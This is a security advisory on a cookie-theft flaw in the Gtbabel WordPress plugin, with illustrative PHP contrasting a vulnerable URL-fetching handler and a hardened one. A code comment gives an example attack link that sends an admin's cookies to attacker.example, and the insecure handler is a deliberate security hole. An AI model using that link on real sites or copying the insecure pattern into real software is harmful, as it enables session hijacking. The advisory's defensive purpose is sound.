Gtbabel WordPress Plugin Unauthenticated Cookie Theft Vulnerability

Vulnerability

Gtbabel WordPress plugin versions prior to 6.6.9 are affected. When the plugin fetches a URL for code analysis, it does not verify that the URL belongs to the site the plugin is installed on, and the outgoing analysis request carries the cookies of the user who triggered it. An unauthenticated attacker can therefore craft a link that, when opened by a logged-in user such as an administrator, makes the plugin send that user's cookies to an attacker-controlled URL.
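
The pattern described above, reconstructed as an added illustration: this is hypothetical code written for this page, not Gtbabel's own handler, and the action name `demo_analyze`, the function names and the `manage_options` capability are assumptions. The insecure function shows the flaw class (an unchecked URL fetched with the caller's cookies attached); the secure function adds the same-site check the advisory says was missing, and, as defence in depth beyond what the advisory specifies, a nonce and capability check so that merely opening a link cannot trigger the fetch.

```php
<?php
/*
 * Added illustration (not Gtbabel's code). A hypothetical admin-ajax handler
 * that fetches a page for "analysis" on behalf of the current user.
 * Everything named demo_* is an assumption made for this example.
 */

/* BEFORE (vulnerable pattern, hypothetical): the URL is taken from the request
 * unchecked, and the caller's cookies are forwarded so the fetched page renders
 * as the logged-in user. A link such as
 *   /wp-admin/admin-ajax.php?action=demo_analyze&url=https://attacker.example/
 * opened by an admin makes this site send the admin's cookies to attacker.example. */
function demo_insecure_analyze() {
    $url = isset( $_GET['url'] ) ? esc_url_raw( wp_unslash( $_GET['url'] ) ) : '';

    // No origin check: $url may point anywhere, and $_COOKIE goes along with it.
    $response = wp_remote_get( $url, array( 'cookies' => $_COOKIE ) );

    if ( is_wp_error( $response ) ) {
        wp_send_json_error( $response->get_error_message(), 502 );
    }
    wp_send_json_success( strlen( wp_remote_retrieve_body( $response ) ) );
}

/* AFTER: accept only http(s) URLs whose host and port equal those of home_url(). */
function demo_is_same_site_url( $url ) {
    $target = wp_parse_url( $url );
    $home   = wp_parse_url( home_url() );

    if ( empty( $target['scheme'] ) || empty( $target['host'] ) || empty( $home['host'] ) ) {
        return false; // relative and protocol-relative URLs are rejected outright
    }
    if ( ! in_array( strtolower( $target['scheme'] ), array( 'http', 'https' ), true ) ) {
        return false;
    }
    if ( strtolower( $target['host'] ) !== strtolower( $home['host'] ) ) {
        return false; // user:pass@host tricks are split off by wp_parse_url, so they fail here
    }
    $target_port = isset( $target['port'] ) ? (int) $target['port'] : 0;
    $home_port   = isset( $home['port'] ) ? (int) $home['port'] : 0;
    return $target_port === $home_port;
}

function demo_secure_analyze() {
    // A nonce bound to the action stops the "get the admin to open this link" vector;
    // check_ajax_referer() dies with a 403 when the nonce is missing or invalid.
    check_ajax_referer( 'demo_analyze' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    $url = isset( $_GET['url'] ) ? esc_url_raw( wp_unslash( $_GET['url'] ) ) : '';
    if ( '' === $url || ! demo_is_same_site_url( $url ) ) {
        wp_send_json_error( 'url must point at this site', 400 );
    }

    // Cookies are forwarded only now that the destination is known to be this site.
    // Redirects are disabled so a same-site URL cannot bounce the cookie-bearing
    // request to another host.
    $response = wp_remote_get( $url, array(
        'cookies'     => $_COOKIE,
        'redirection' => 0,
        'timeout'     => 10,
    ) );

    if ( is_wp_error( $response ) ) {
        wp_send_json_error( $response->get_error_message(), 502 );
    }
    wp_send_json_success( strlen( wp_remote_retrieve_body( $response ) ) );
}

// Only the hardened handler is registered; the insecure one is shown for contrast.
add_action( 'wp_ajax_demo_analyze', 'demo_secure_analyze' );
```

A caller of the hardened endpoint must include a nonce created with `wp_create_nonce( 'demo_analyze' )` as `_wpnonce` (or `_ajax_nonce`) in the request. If the analysis does not actually need to see the page as the logged-in user, the simplest fix is to drop the `cookies` argument entirely and fetch the page anonymously; the same-site check is then a second line of defence rather than the only one.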

Impact

An attacker who obtains a victim's session cookies can hijack that session and act as the victim, including as an administrator. Since only versions prior to 6.6.9 are affected, updating Gtbabel to 6.6.9 or later resolves the issue.

Added: Jun 9, 2025, 7:46 PM
Updated: Jun 9, 2025, 7:46 PM

Vulnerability Rating

Custom Algorithm

spread          1.0
impact          6.7
exploitability  7.9
remediation     7.7
relevance       0.0
threat          6.4
urgency         2.9
incentive       1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.